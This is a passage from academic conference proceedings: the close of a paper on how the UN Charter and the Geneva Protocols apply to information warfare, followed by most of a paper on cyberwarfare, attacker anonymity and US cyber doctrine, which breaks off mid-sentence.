clearly. That might be the main reason why the use of force prohibition encounters difficulty when<br />
translated into the IW context. Not all hostile acts are uses of force. Traditionally, states defined ‘force’<br />
in terms of the instrument used, including ‘armed’ force within the prohibition, but excluding economic<br />
and political forms of coercion. This distinction reflects an effort to proscribe those acts most likely to<br />
interfere with the U.N.’s primary purpose: maintaining international peace and security.<br />
The classic ‘instrumentality’ approach argues that IW does not qualify as armed force because it lacks<br />
the physical characteristics associated with military coercion (Hollis 2007). The analysis looks at<br />
whether there is kinetic impact: some type of explosion or physical force. The Charter was created in<br />
the days of weapons that provided blast, heat, and fragmentation damage, so it is clear that these<br />
types of kinetic weapons were exclusively present in the minds of the drafters.<br />
Still, some types of cyber attacks can be determined to be uses of force. Since the determination of a<br />
use of force requires that a weapon be used, there first must be a method of analogizing IW attacks to<br />
weapons. A very good method could be the one proposed by Ian Brownlie, which shifts the traditional<br />
use of force analysis from a purely kinetic analysis, based on physical force being applied to the<br />
target, to a result-based analysis, evaluating IW attacks is not limited to focusing on the method of the<br />
attack (Brownlie 1963). A result-based analysis requires looking at whether there is a kinetic result,<br />
that cause damage or injury, rather than whether the weapon itself is kinetic.<br />
The text of the U.N. Charter offers additional support for the ‘instrumentality’ view in Article 41, which<br />
states that ‘measures not involving the use of armed force’ include ‘complete or partial interruption of<br />
(…) telegraphic, radio, and other means of communication’ (Charter of the United Nations, Art.41).<br />
Clearly, ‘other means of communications’ fairly encompasses computer communications and<br />
communication over computer networks. It seems that Article 41 permits countries to deprive another<br />
nation of its communications, as well as interrupting communications by manipulation of the target<br />
country's data such that it is corrupt and untrustworthy, altering the data to render it useless for that<br />
nation's purpose, and actually altering the data such that it achieves an intended purpose for the<br />
aggressor nation (DiCenso 2000). Although such measures sound like fair game for IW, the<br />
provisions of Article 41 still require the Security Council to decide what measures are to be employed<br />
under that article, including force and actions that do not include armed force.<br />
In order to retain its effectiveness, the Charter’s interpretations must evolve to some degree. The<br />
extent to which this happens is important in applying use of force analysis under Article 2(4) as new<br />
types of warfare develop. If the definition of the ‘use of force’ is static, then the ban on the use of force<br />
gradually will become less effective as new interstate actions occur beyond the boundaries of what<br />
the drafters considered (Barkham 2001).<br />
Difficulty in characterizing certain forms of information warfare as ‘force’ or ‘aggression’ under<br />
international law does not mean that international legal institutions cannot respond to such attacks.<br />
For example, Chapter VII of the U.N. Charter gives the UN Security Council the authority and<br />
responsibility to determine the existence of any ‘threat to the peace’ or acts of aggression (Charter of<br />
the United Nations, Article 39) and the Council can recommend and lead responses to that (Charter of<br />
the United Nations, Article 40). Many information attacks that may not constitute ‘force’ or ‘aggression’<br />
could certainly be considered threats to the peace and thus subject to Security Council action,<br />
perhaps including the use of military force. After all, anything that would anger a government to the<br />
point that it might feel the need to resort to military action could thus threaten the peace, even if the<br />
provocative action was not technically illegal (Greenberg 1998).<br />
Of particular interest for IW analysis is Article 51 of the U.N. Charter, the only exception to the rule<br />
stated in Article 2(4). According to Article 51, states can use force pursuant to the inherent right of<br />
self-defense in response to an armed attack: ’Nothing in the present Charter shall impair the inherent<br />
right of individual or collective self-defense if an armed attack occurs against a Member of the United<br />
Nations, until the Security Council has taken measures necessary to maintain international peace and<br />
security’ (Charter of the United Nations, Art.51). As sole authorization of unilateral use of force outside<br />
the U.N. Charter security system, this provision responds to the reality that the international<br />
community may not be able to react quickly enough to armed aggression to forestall attack on a victim<br />
state. It therefore permits states and their allies to defend themselves until the international help<br />
arrives pursuant to Chapter VII.<br />
202
Alexandru Nitu<br />
Article 51 restricts a state’s right of self-defense to situations involving ’armed attack’, a narrower<br />
category of act than Article 2(4)’s ’use of force’. Although coercion not involving armed force may<br />
violate Article 2(4) and result in action under Article 39, it does not follow that states may also react<br />
unilaterally pursuant to Article 51. This narrowing plainly reflects the Charter’s preference for<br />
community responses over individual ones, even to threats to peace (Schmitt 1999). In the case of a<br />
IW attack, it is also a prudent approach due to the difficulty states may have in identifying the correct<br />
source of an attack.<br />
The main problem IW poses for Article 2(4) does not derive from its large-scale applications, but from<br />
attacks that do not destroy life or property, such as subversion of property, electronic blockades, and<br />
incursions. The large-scale attacks are similar to conventional methods of warfare and fit comfortably<br />
within traditional use of force analysis. The lower-level attacks present the problem when analyzed<br />
under Article 2(4) because they threaten to erase the distinction between acts of force and acts of<br />
coercion. The severity of an IW attack might not be identified promptly, so it would not be feasible to<br />
require a victim to conduct a damage assessment to determine whether an IW penetration were a use<br />
of force or merely of coercion. (Barkham 2001)<br />
3. International legal limits on IW<br />
3.1 Limits on the use of weapons<br />
Many of the international legal provisions regarding armed conflicts are found in the 1949 Geneva<br />
Conventions and the 1977 Additional Protocols to the Geneva Conventions. The Geneva<br />
Conventions, with their focus on the protection of persons in enemy hands, are of some relevance to<br />
IW. Without reference to specific weapons, the Additional Protocols (AP) address various methods<br />
and means of warfare in general terms, thus being able to present a framework for the use of IW.<br />
In order for International Humanitarian Law (IHL) to apply to a particular armed conflict, neither formal<br />
declaration of war, nor recognition of a state of war is required. Instead, the requirements of the law<br />
become applicable as from the actual opening of hostilities. An international armed conflict is<br />
perceived as any difference arising between two States and leading to the intervention of armed<br />
forces, even if one of the Parties denies the existence of a state of war (Pictet 1952).<br />
There is no doubt that an armed conflict exists and IHL applies once traditional kinetic weapons are<br />
used in combination with new methods of IW. The most difficult situation, as far as applicability of IHL<br />
is concerned, would be the one where the first, or the only hostile acts are conducted by means of IW.<br />
The question is if this type of conflict depends on the type of attack in order to be qualified as<br />
constituting an armed conflict within the meaning of the 1949 Geneva Convention and the Additional<br />
Protocols.<br />
Same as in the U.N. Charter’s case, the fact that IW developed only after the adoption of the<br />
Protocols does not exclude their applicability. The first Additional Protocol to the Geneva Conventions<br />
made specific reference for consideration of new weapons. Article 36 of Additional Protocol I (AP I) is<br />
a strong indicator that the drafters of AP I anticipated the application of its rules to new developments<br />
of methods and means of warfare. This provision requires that ‘In the study, development, acquisition<br />
or adoption of a new weapon, means or method of warfare, a High Contracting Party is under an<br />
obligation to determine whether its employment would, in some or all circumstances, be prohibited by<br />
this Protocol or by any other rule of international law applicable to the High Contracting Party’<br />
(Protocol Additional to the Geneva Conventions 1977). This statement obligates a nation at least to<br />
consider the laws of armed conflict before employing IW means. That consideration should focus on<br />
both the means of force and perhaps more importantly on the effects.<br />
Consequently, the fact that a particular military activity constituting a method of warfare is not<br />
specifically regulated does not mean that it can be used without restrictions. Based on that, nothing<br />
precludes assuming that the more recent forms of IW, which do not involve the use of traditional<br />
weapons, are subject to IHL just as any new weapon or delivery system has been so far when used in<br />
an armed conflict. (Dörmann 2004)<br />
Another fundamental rule of warfare, found in Article 35 (1) of AP I, states that ‘the right of the Parties<br />
to the conflict to choose methods or means of warfare is not unlimited’ (Protocol Additional to the<br />
Geneva Conventions 1977). So far, hostilities have involved physical violence and kinetic energy<br />
203
Alexandru Nitu<br />
leading to human casualties or material damage. In the case of IHL, the motivation for the application<br />
of the law is to limit the damage and provide care for the casualties. This would support an expansive<br />
interpretation of when IHL begins to apply. If a cyber attack is directed against an enemy in order to<br />
cause physical damage or loss of life, it can hardly be disputed that such an attack is in fact a method<br />
of warfare and is subject to limitations under IHL. (Dörmann 2004)<br />
3.2 The principle of distinction<br />
Just as information warfare attacks may be difficult to encompass within the ‘use of force’ concept, it<br />
may be also difficult to define their targets as military (and thus generally legitimate targets) or civilian<br />
(generally forbidden). The dual-use nature of many telecommunications networks complicates the<br />
questions of the applicability of IHL as a constraint on information warfare, because the intangible<br />
damage that cyber attacks cause may not be the sort of injuries against which the humanitarian law of<br />
war is designed to protect noncombatants. (Greenberg 1998)<br />
The definition of the term “attack” is of decisive importance for the application of the various rules<br />
giving effect to the principle of distinction and for most of the rules providing special protection for<br />
certain objects. In accordance with Art. 49 (1) of AP I, ‘attacks’ means acts of violence against the<br />
adversary, whether in offence or in defense (Protocol Additional to the Geneva Conventions 1977). If<br />
the term ‘acts of violence’ denotes only physical force, the concept of ‘attacks’ excludes dissemination<br />
of propaganda, embargoes or other non-physical means of psychological, political or economic<br />
warfare. (Dörmann 2004)<br />
Based on that understanding and distinction, cyber attacks through viruses, worms, logic bombs etc.<br />
that result in physical damage to persons, or damage to objects that goes beyond the computer<br />
program or data attacked can be qualified as ‘acts of violence’ and thus as an attack in the sense of<br />
IHL. From this point of view, it is helpful to look at how the concept of attack is applied to other means<br />
and methods of warfare. There is general agreement that, for example, the employment of biological<br />
or chemical agents that does not cause a physical explosion, such as the use of asphyxiating or<br />
poisonous gases, would constitute an attack (Dörmann 2004).<br />
If one admits that employing a IW method constitute an attack, AP I imposes:<br />
The obligation to direct attacks only against "military objectives" and not to attack civilians or<br />
civilian objects; (Protocol Additional to the Geneva Conventions 1977, Art. 48, 51 (2), 52)<br />
The prohibition of indiscriminate attacks, including attacks that may be expected to cause<br />
excessive incidental civilian casualties or damages; (Protocol Additional to the Geneva<br />
Conventions 1977, Art. 51 (4), (5))<br />
The requirement to take the necessary precautions to ensure that the previous two rules are<br />
respected, (Protocol Additional to the Geneva Conventions 1977, Art. 57) in particular the<br />
requirement to minimize incidental civilian damage and the obligation to abstain from attacks if<br />
such damage is likely to be excessive to the value of the military objective to be attacked;<br />
(Protocol Additional to the Geneva Conventions 1977, Art. 51 (5)(b), 57 (2)(a)(ii) and (iii))<br />
These rules operate in exactly the same way whether the attack is carried out using traditional<br />
weapons or IW techniques. Problems that arise in applying these rules are therefore not necessarily<br />
unique to IW. They are more related to the interpretation of, for example, what constitutes a military<br />
objective or which collateral damage would be excessive.<br />
4. Legal perspectives on IW<br />
The laws of war always faced two challenges. The first was that war's confrontational nature and<br />
tremendously high stakes often frustrated efforts to set reasonable limits on behavior. Fortunately, the<br />
international community has generated international conventions and war crimes tribunals to solve<br />
this problem.<br />
The laws of war also face a second challenge, which is how to adapt these laws to technological<br />
change. This dynamic itself is as old as civilization, but it became more acute in the last one hundred<br />
years, since technological progress has accelerated. The result is that weapons are developing much<br />
faster than international law, and there is every reason to believe that this trend will continue to<br />
accelerate in the future.<br />
204
Alexandru Nitu<br />
As IW strategy and technology evolve, international law scholars will have to fit this new kind of<br />
warfare into an analytical framework developed to address a different conception of war.<br />
First, the U.N. Charter and other existing treaty regimes do not create a clear legal prohibition of many<br />
types of IW attacks. For international law effectively to address IW attacks there must be established<br />
a correspondence between terms like ‘use of force’, ‘armed attack’ or ‘armed aggression’ and IW<br />
methods and means of combat. Also, it would be necessary to set limits to IW activities similar to the<br />
classic jus in bello principles, like just war, discrimination or proportionality.<br />
The second, and the more difficult part, is to find a way to solve the practical problems associated<br />
with both launching and defending against cyber attacks, including the fundamental issue of<br />
attribution and in particular state responsibility for cyber attacks. It is technically challenging to localize<br />
the physical place from which such an act originates. But even if the origin of an attack can be<br />
localized within a particular state, it would be challenging to determine whether the attacker was<br />
acting in an individual capacity, or on behalf of a criminal organization, the government or armed<br />
forces.<br />
Just as the identity of the attacker raises difficult questions for any potential IW treaty, so does the<br />
identity of the victim. In an IW context, it becomes necessary to ask whether an attack on a company<br />
or an institution is an attack on a whole country. It is not necessarily clear that the state in whose<br />
territory the injured party resides is the injured state. In a conventional attack, the country where the<br />
attack is located has been attacked because its territorial integrity has been violated, but cyberspace<br />
is not a customary arena over which states may exercise such control.<br />
From a humanitarian law perspective, it would be essential to be able to ‘mark’ in some way the<br />
information systems used to maintain the viability of critical social infrastructure facilities. In the<br />
physical world, some of these facilities (such as hospitals) display a distinctive sign, indicating their<br />
protected status. Such identifying signs are absent in cyberspace, nor do criteria exist for designating<br />
these systems as critical infrastructure.<br />
5. Conclusions<br />
Because of the newness of much of the technology involved, no provision of international law<br />
explicitly addresses to information warfare. This absence of prohibitions is significant because, as a<br />
crudely general rule, that which international law does not prohibit it permits. But the absence is not<br />
dispositive, because even where international law does not address particular weapons or<br />
technologies, its general principles may apply to the use of those weapons and technologies<br />
(Greenberg 1998).<br />
Although the existing body of international law does not necessarily provide definitive and universally<br />
accepted answers to the legal issues that Information Warfare development rises, it does provide a<br />
structure by which these issues could be addressed and analyzed. However, in order to apply existent<br />
norms to IW, it is necessary to accept the consequence-based interpretations of “armed conflict” and<br />
“attack”. In the absence of such understandings, the applicability, and therefore adequacy, of presentday<br />
humanitarian law principles would come into question. The consideration of IW in the context of<br />
jus ad bellum also leads to consequence-based interpretation.<br />
Devising a system of international law adressing Information Warfare or Information Operations could<br />
rectify many of the deficiencies of the current legal system and provide states with additional<br />
functional benefits that do not currently exist. First, it can remedy uncertainty. Drafting new rules<br />
provides an opportunity to rectify translation problems that plague IW under the law of war. It could<br />
give states and their militaries a clear sense of the rules of engagement in the information age.<br />
A dedicated law would allow states not simply to choose among available interpretations of the<br />
prohibition on the use of force, but to craft a standard tailored to IW without the additional inclusion<br />
problems that currently exist. Similarly, states could set the bar for when IW triggers the civilian<br />
distinction requirement and address whether any or all information networks constitute legitimate<br />
military objectives.<br />
Disclaimer:The views, opinions, and recommendations contained in this analysis are those of the<br />
author and should not be construed as an official position, policy, or decision of the Romanian<br />
Intelligence Service<br />
205
6. References<br />
Alexandru Nitu<br />
Barkham, J. (2001), Information Warfare and International Law on the Use of Force, New York University Journal<br />
of International Law and Politics, vol. 34, pp. 57-113.<br />
Brownlie, I. (1963), International Law and the Use of Force by States, Clarendon Press, Oxford<br />
Charter of the United Nations and Statute of the International Court of Justice (1985), United Nations,<br />
Department of Public Information<br />
DiCenso, D. (2000), Information Operations: An Act of War?, Air & Space Power Chronicles. Available at<br />
http://www.airpower.maxwell.af.mil/airchronicles/cc.html.<br />
Dörmann, K. (2004), Applicability of the Additional Protocols to Computer Network Attacks, International Expert<br />
<strong>Conference</strong> on Computer Network Attacks and the Applicability of International Humanitarian Law,<br />
Stockholm, Available at http://www.icrc.org/web/eng/siteeng0.nsf/html/68LG92<br />
Greenberg, L.T., Goodman, S.E., Soo Hoo, K.J. (1998), Information Warfare and International Law, National<br />
Defense University Press. Available at http://www.iwar.org.uk/law/resources/iwlaw/iwilindex.htm<br />
Hollis, Duncan B. (2007), Why States Need an International Law for Information Operations. Lewis & Clark Law<br />
Review, Vol. 11, p. 1023, Temple University Legal Studies Research Paper No. 2008-43. Available at<br />
http://ssrn.com/abstract=1083889<br />
Joint Chiefs of Staff (1998), Joint Doctrine for Information Operations, Joint Publication 3-13.<br />
Pictet, J. (1952), Commentary on the Geneva Convention for the Amelioration of the Condition of the Wounded<br />
and Sick in Armed Forces in the Field, International Committee of the Red Cross, Geneva.<br />
Protocol Additional to the Geneva Conventions of 12 August 1949, and relating to the Protection of Victims of<br />
International Armed Conflicts (Protocol I), 8 June 1977. Available at http://www.icrc.org<br />
Schmitt, Michael N. (1999), Computer Network Attack and the Use of Force in International Law: Thoughts on a<br />
Normative Framework, Columbia Journal of Transnational Law, Vol. 37, 1998-99. Available at:<br />
http://ssrn.com/abstract=1603800<br />
Shackelford, S.J. (2009), From Nuclear War to Net War: Analogizing Cyber Attacks in International Law, Berkeley<br />
Journal of International Law, Vol. 25, No. 3, pp. 191-250.<br />
206
Cyberwarfare and Anonymity<br />
Christopher Perr<br />
Auburn University, USA<br />
cwp0002@auburn.edu<br />
Abstract: Public policy and strategy do not keep up to date with technology. There is generally a lag time<br />
between the release and application of a technology till a shortcoming is observed. Once a shortcoming is<br />
revealed it is a race to address that potential weakness with improved policy, updated strategy, a technological<br />
initiative to combat the shortcoming, or a necessary combination of all methods. The invent of computer reliant<br />
and networked systems has created a modern arms race which has seen more innovation and more need for<br />
updated policy and strategy than any other period in history, yet the United States continues to fall behind in this<br />
arms race. When security cannot be verified, but only risk mitigated, it is time to think deterrence. Unfortunately,<br />
deterrence falls apart when you cannot identify the perpetrator behind attacks. This paper will look at the role that<br />
information has played in previous conflicts, as well as the modern strategy towards protecting the United States<br />
in cyberspace, and will draw a singular conclusion as to the best course of action towards improving our security.<br />
Through a mix of policy, strategy, and technology the anonymity which attackers use as a shield needs to be<br />
eliminated in order to allow room for a strong policy of deterrence with a verifiable response. In establishing the<br />
means to identify our attackers and provide serious recourse cybersecurity can be greatly improved for the<br />
United States.<br />
Keywords: information warfare, security, policy, strategy, history, information security<br />
1. The motivation<br />
“We’re already at war in cyberspace; have been for many years.”<br />
Gen Ronald E. Keys, Commander, Air Combat Command<br />
On 6 September 2007 Fulghum reported that Israeli aircraft flew into Syria from Turkey and destroyed<br />
a construction site (2007). The site was thought to have contained equipment for the refinement of<br />
weapons grade nuclear material provided by North Korea.<br />
The interesting part of this story for the purposes of this paper is that Syria, a country with an<br />
advanced anti-air defense system purchased from Russia, did not even see the 10 F-15Is appear on<br />
their radar. These are not stealthy aircraft, and with weapons hanging off the wings, should have been<br />
easily spotted on radar. Further, troops were massing at Israel’s borders signaling a possible attack.<br />
Syria was expecting something. So what happened?<br />
The thought is that the Israeli’s were able to somehow disable the radar sites and to provide a window<br />
where the jets could get in, bomb the target, and leave without threat. Was it a trap door in the radar<br />
software? Did the Israeli’s use a special UAV to signal blank radar screen to the radar sites? They<br />
haven’t said yet, and the only clear part is that Israel ‘owned’ those sites for a single night and proved<br />
the strength of cyber warfare.<br />
Unfortunately, if the U.S. were in this tale we would be more like Syria than Israel.<br />
2. Open source<br />
Due to publication constraints, and the desire to stay at the unclassified level, this paper will deal only<br />
with open resources.<br />
3. The (not so) recent history of information operations<br />
“It is pointless to deal with enemy military forces if they can be bypassed by strategy or<br />
technology.”<br />
Col John A. Warden III, USAF, Retired<br />
Net-centric warfare has become a much bandied about buzzword in the modern military vernacular. A<br />
simple definition of net-centric warfare from the Office of Force Transformation (2005) is:<br />
“the translation of an information advantage, enabled in part by information technology,<br />
into a competitive war fighting advantage through the use of well-informed geographically<br />
dispersed forces.<br />
207
Christopher Perr<br />
Historical examples of this can be pointed to before the term ‘IT’ was even coined, one such being<br />
General William T. Sherman’s use of the telegraph to effectively shorten the kill chain of his day.<br />
The kill chain is how forces find, fix, track, target, engage, and assess an enemy force today. It is a<br />
loop where the exit is the destruction of your target. In Sherman’s time the kill chain was shortened by<br />
drastically cutting the amount of time it took to communicate with his geographically separated forces.<br />
None of these terms were used in Sherman’s time, but the concept is not new.<br />
According to Arquilla (2007), Sherman is also useful for another example. His dependence on the<br />
telegraph and the lack of security was highlighted when the Confederate forces started to attack the<br />
lines that carried the vital communications. This caused troops to be pulled from the battlefield for<br />
protection, and while it may have been too late in the war to make a difference, caused a dilution of<br />
the Union’s forces. The telegraph showed how the kill chain can be thought of not in distances but in<br />
time to decision making, and was also shown to be a possible center of gravity to which doctrine must<br />
be modified to defend.<br />
History is rife with examples of how technology has affected the way we think about and execute<br />
conflict. The telegraph is historically the single largest increase in communication bandwidth. As its<br />
was recognized as a powerful tool for command and control, dependence on the telegraph as the only<br />
manner for controlling troops was recognized as a possible center of gravity and weakness to be<br />
exploited<br />
4. The (more) recent history of information operations the environment of<br />
information operations<br />
“An information war is inexpensive, as the enemy country can receive a paralyzing blow<br />
through the Internet, and the party on the receiving end will not be able to tell whether it<br />
is a child’s prank or an attack from its enemy.”<br />
Wei Jincheng, excerpted from the Military Forum column, Liberation Army Daily, 25 June<br />
1996<br />
The First Gulf War is widely viewed as a major success according to Campen (1992). The<br />
preparations involved repetitive rehearsals, planning, critique, and then more rehearsal. The rest of<br />
the world watched as, what was at the time, the fourth largest force in the world got rolled over in a<br />
matter of days. That was 1991, and even though the communication network was almost thrown<br />
together the tactics and techniques used proved to be game changing.<br />
Baucon (2010) notes that by 1995 forces around the globe had taken such a notice to the<br />
revolutionary way that U.S. forces had used modified blitzkrieg maneuvers combined with supreme<br />
command and control enabled by a technical advantage that those forces had changed their strategy<br />
and force composition. It was clear that smart weapons and use of information warfare had made a<br />
profound effect<br />
Fast forward a bit, and a lot has happened since the Gulf War. In 2007 a conflict arose in Estonia with<br />
Russia over the existence and placement of the Bronze Soldier of Tallinn. This spawned what the<br />
Russian government called a ‘online response by patriotic individual citizens’. Estonia, a ‘highly<br />
connected web friendly’ country, was now the victim of various bot-net and denial of service attacks<br />
which brought the internet in that country to a halt. Waterman (2007) wrote that the attack was<br />
characterized by Professor James Hendler, a former chief scientist at DARPA, as<br />
“...more like a cyber riot than a military attack”<br />
Speculation seems to imply that the Russian government sought out the help of organized crime and<br />
individual hackers to carry out the attacks. The effect was the same as a conventional siege, and the<br />
attacks were reported as a ‘crime’ by the Russians. The Estonian government requested aid in<br />
investigation as outlined in Mutual Legal Assistance Treaty. Russia declined their requests (Leyden,<br />
2008)<br />
Other cases to look at are the cyber attacks perpetrated by North Korea on the United States and<br />
South Korea in July of 2009. On the 4th of July North Korea attacked a large number of government<br />
websites with bot-net and DDoS attacks seeking suspected political bargaining power. The attacks<br />
were felt mildly here in the U.S. due to filtering addresses and distribution of website sources, but the<br />
208
Christopher Perr<br />
attacks again helped to show how vulnerable we are to even unsophisticated cyber attacks (U.S. eyes<br />
N. Korea for ‘massive’ cyber attacks, 2010).<br />
5. The current state of our cyber doctrine<br />
It has become appallingly obvious that our technology has exceeded our humanity.<br />
Albert Einstein<br />
The opening of this paper ends with a pretty controversial statement, and is done so with a purpose.<br />
The case with Iran and Syria show how a dependence on technology can seriously threaten a nation.<br />
Evidence exists to show that the United States might be in a position where we are overly dependent<br />
on technology in key areas with a limited ability to defend ourselves. Our current policies regarding<br />
cyber warfare serve as the main cause.<br />
The most recent example to support this statement is in the written answers which General Keith<br />
Alexander, the nominee for commander of the new Cyber Command, provided to the Senate Armed<br />
Services Committee on 15 April 2010. In one question he answered<br />
“President Obama’s cybersecurity sixty-day study highlighted the mismatch between our<br />
technical capabilities to conduct operations and the governing laws and policies, and our<br />
civilian leadership is working hard to resolve the mismatch (Markoff, 2010).”<br />
General Alexander’s response highlights an ongoing issue in the Department of Defense and, since<br />
the vulnerability to the United States extends into the civil realm, in public policy as well. General<br />
Alexander also speaks to the large gap created by having very effective offensive cyber capabilities<br />
without developed defensive capabilities.<br />
The 2003 Information Operations Roadmap served as the initial White House level guide for how the<br />
armed forces conduct information operations (Miller, 2010). This document is very general and at a<br />
level above specifics about cyber-warfare, but some important information can be gleaned from it.<br />
First, cyber warfare is treated as an extension of information and conventional operations. Second, it<br />
was decided that our current policy and force preparedness was not at a level capable of meeting the<br />
countries cyber needs. Third, the civil realm of cyber operations was almost completely ignored<br />
except to say that there could be some effect from operations and as such considerations should be<br />
weighed.<br />
The only other repeating theme in the document was to note the need to “deny, degrade, disrupt or<br />
destroy a broad range of adversary threats, sensors, command and control and critical support<br />
infrastructure.” This seems to assume that when cyber comes into play, it will be only against another<br />
country that has a similar dependence on technology as the United States. This document also<br />
highlights how the term “cyber war” can be incredibly limiting, and neglects a lot of the tactics and<br />
resources which could be utilized if cyber operations were not limited to ‘conventional war’ alone.<br />
The first main theme is vital to understand, and is echoed in a recent article in the Air and Space<br />
Power Journal “Cyber This, Cyber That...So What? (Trias, 2010)” This article discusses integrating<br />
cyberspace operations as well as counter cyberspace with everything from special operations to aerial<br />
refueling is greatly advocated. Due to the pervasive nature of cyberspace almost all doctrine should<br />
be looked at to at least include defensive elements of cyber security, and could probably benefit from<br />
looking to how offensive cyber operations could aid in mission effectiveness.<br />
The article also recognizes how slow going and agonizing the process of updating doctrine without<br />
clear policy guidance can be.<br />
“Air Force strategists are struggling to create doctrinal principles for cyber warfare in the<br />
form of Air Force Doctrine Document (AFDD) 2-11, “Cyberspace Operations,” now<br />
several years in draft.” (Trias, 2010)<br />
The reason the Air Force could be having such a difficult time is linked to our second issue. In<br />
response to the Information Operation Roadmap some major changes began to take place in the<br />
cyber realm. New commands and squadrons were stood up across the Department of Defense (DoD)<br />
in what from the outside looked like a power grab, and in eventual response it was decided that there<br />
needed to be a new joint command created to oversee cyber operations and defense, and to track<br />
capabilities and assets in the DoD.<br />
209
Christopher Perr<br />
This command is the new U.S. Cyber Command and was announced in June of 2009. Before that the<br />
Air Force was hoping to form their own combatant command, but instead settled for a numbered<br />
command. The Navy and Army have their own units as well. With all these new units confusion<br />
regarding responsibility is inevitable.<br />
The mission of U.S. Cyber Command is:<br />
“...to coordinate computer-network defense and direct U.S. cyber attack operations (US<br />
military prepares for ‘cyber command, 2010).”<br />
Unfortunately, this new command with a somewhat clear mission did not seem to solve all of the ills<br />
that cyberspace has created. In January of 2010 the Pentagon attempted to respond to a simulated<br />
cyber attack.<br />
“The results were dispiriting. The enemy has all the advantages: stealth, anonymity, and<br />
unpredictability. No one could pinpoint the country from which the attack came, so there<br />
was no effective way to deter further damage by threatening retaliation. What’s more, the<br />
military commanders noted that they even lacked the military authority to respondespecially<br />
because it was never clear if the attack was an act of vandalism, an attempt at<br />
commercial theft, or a state-sponsored effort to cripple the United States, perhaps as a<br />
prelude to conventional war (Markoff, 2010).”<br />
As U.S. Cyber Command has not officially stood up yet it can only be hoped that the response to a<br />
cyber attack would improve after a governing body has been established. Unfortunately, this still<br />
leaves a third problem in our cyber strategy. What about the civilian side?<br />
In March of this year a graduate student in Liaoning, China named Wang Jianwei authored a paper<br />
titled “Cascade-Based Attack Vulnerability on the U.S. Power Grid.” The paper actually had nothing to<br />
do with attacking the U.S. power grid, but instead was a technical exercise with the goal of increasing<br />
security for networked power grids. The paper still created cries of outrage and questions as to who<br />
was in charge of our grids well-being. The interesting part to take note of is that Jianwei chose the<br />
U.S. power grid because it had the most information available on the inner workings of the network<br />
(Markoff, 2010).<br />
At the same time, according to Nielsen Online, in August of 2009 almost 75% of the United States<br />
was listed as ‘users of the internet’ (Miniwatts Marketing Group, 2009). You can imagine that ‘internet<br />
user’ includes lots of activities like banking, social networking, commerce, and business. Without even<br />
mentioning necessities like the power grid or other services, the e-commerce sector alone was worth<br />
more than $100 billion in 2007. You can see why the civilian sector would have a vested interest into<br />
the handling of cybersecurity. The concern is that the DoD will dominate the area of cybersecurity and<br />
the civilian side will be forced to submit to harsh and sometimes arbitrary regulation.<br />
The answer to the concerns raised about the DoD’s dominance of cyber security and operations? The<br />
Department of Homeland Security will eventually be receiving a Director for Cybersecurity, and<br />
currently has in place an Office of Cybersecurity and Communications. Their specific responsibility is<br />
listed below.<br />
“The Office of Cybersecurity and Communications (CS&C) is responsible for enhancing<br />
the security, resiliency, and reliability of the nation’s cyber and communications<br />
infrastructure. CS&C actively engages the public and private sectors as well as<br />
international partners to prepare for, prevent, and respond to catastrophic incidents that<br />
could degrade or overwhelm these strategic assets (Department of Homeland Security,<br />
2010).”<br />
As of right now it could be said that none of that is taking place. Recently, when Google first feared<br />
that their operation in China had been hacked, they turned to the NSA, not the Department of<br />
Homeland Security, to help sort out the problem (Markoff, 2010). Where is the communication and<br />
organization for who deals with what? This is without even mentioning that the FBI and the Secret<br />
Service both have units that work in cyber security. The FBI is now also responsible for investigating<br />
cyber crime on U.S. companies even though the attack may have occurred well outside our borders<br />
(FBI probes cyber attack on Citigroup, 2010).With the convoluted policies and rapid changes it is easy<br />
to see where one might be confused. There is no clear guide as to who responds, or how.<br />
Unfortunately, that does not bode well for the defense of the United States. The best that can be said<br />
210
Christopher Perr<br />
about the current state of our cyber doctrine and policies is that we are rapidly improving, but aren’t<br />
there yet.<br />
6. The proposition<br />
“The dogmas of the quiet past are inadequate to the stormy present. The occasion is<br />
piled high with difficulty, and we must rise with the occasion. As our case is new, so we<br />
must think anew and act anew.”<br />
Abraham Lincoln, President of the United States<br />
Message to Congress, 1 December 1862<br />
When the nuclear bomb was unleashed on the world individual countries began seeking their own<br />
nuclear weapons. As a country it was difficult to feel safe without one. With a weapon so massive it<br />
was important that the person with ‘the bomb’ knew that you had the same capability, and that you<br />
would use it if necessary. Unfortunately, this strategy seems ripe to fall apart as the technology<br />
proliferates to anonymous parties. Cyberwar shares a lot in common with the development of strategy<br />
for nuclear weapons. It was a massive revolution in warfighting that spawned a new arms race.<br />
Unfortunately, anonymity is already a very serious issue. Anonymous parties are able to develop and<br />
use very powerful informational weapons, and there is little to identify them or to link them to a party<br />
that can be held accountable. On the bright side, while we cannot yet invent a safe nuclear bomb, we<br />
can invent a safe internet by making several improvements to the one we have now. Lets think of<br />
these improvements in the three ways t0 affect Cybersecurity: strategy, policy, and technological<br />
advancement.<br />
Strategy needs to be considered for both the short term and the long term, and is closely tied in to<br />
technological development. In the short term it is best to consider how to continue patching and<br />
modifying our current internet protocols to make a defensible position in cyberspace. This is basically<br />
applying some common rules in Cybersecurity. If it doesn’t need to be online, don’t put it online. If<br />
there are serious benefits to be gained by networking a system, such as applying networks to the<br />
power grid to facilitate more efficient generation of power, then by all means network the system but<br />
keep it as closed off and private as possible. Finally, when you do need to share something with the<br />
internet or transmit information keep classified information separate, secure the site as much as<br />
possible. Don’t forget to compartmentalize the system as much as possible, geographically distribute<br />
your network where appropriate, keep constant backups, and maintain an appropriate level of<br />
redundancy. For the short term, if these rules are applied judiciously, we just might make it out alive.<br />
Technological advancement and policy are going to be playing a smaller but still vital role in the short<br />
term. Technologically it would be impossible to create the defensible position without working to<br />
defeat and patch the vulnerabilities which the attacks are exploiting, and to track the perpetrators to<br />
the ultimate conclusion. To ignore current security flaws with the hope that the next update would fix<br />
close the gap would be to look the other way at our own peril, and to embolden the individuals or<br />
governments exploiting the flaws in the current system. In the short term, policy should be made that<br />
clearly defines the jurisdiction and responsibilities to the agencies and military bodies charged with<br />
defending the U.S.’s efforts in cyberspace. This effort is to include funding for the technology required<br />
to close the gaps in the security of our networked systems. It should also be noted that a clear<br />
offensive strategy needs to be explained in the short term, especially to note how to abolish the<br />
anonymity which antagonistic countries are operating under as a shield for their own offensive cyber<br />
operations. Funding for education also need to be taken under special consideration as these<br />
antagonistic nations are also funding and attracting top notch talent to their cause instead of working<br />
to develop peaceful relations in this realm.<br />
In the long term the hope is now that we can create a much safer and more stable future by applying<br />
thoughtful design. In this sense the long term goal of cyber strategy and technological development<br />
should be to create a network infrastructure which is more anticipatory against attack then reactive to<br />
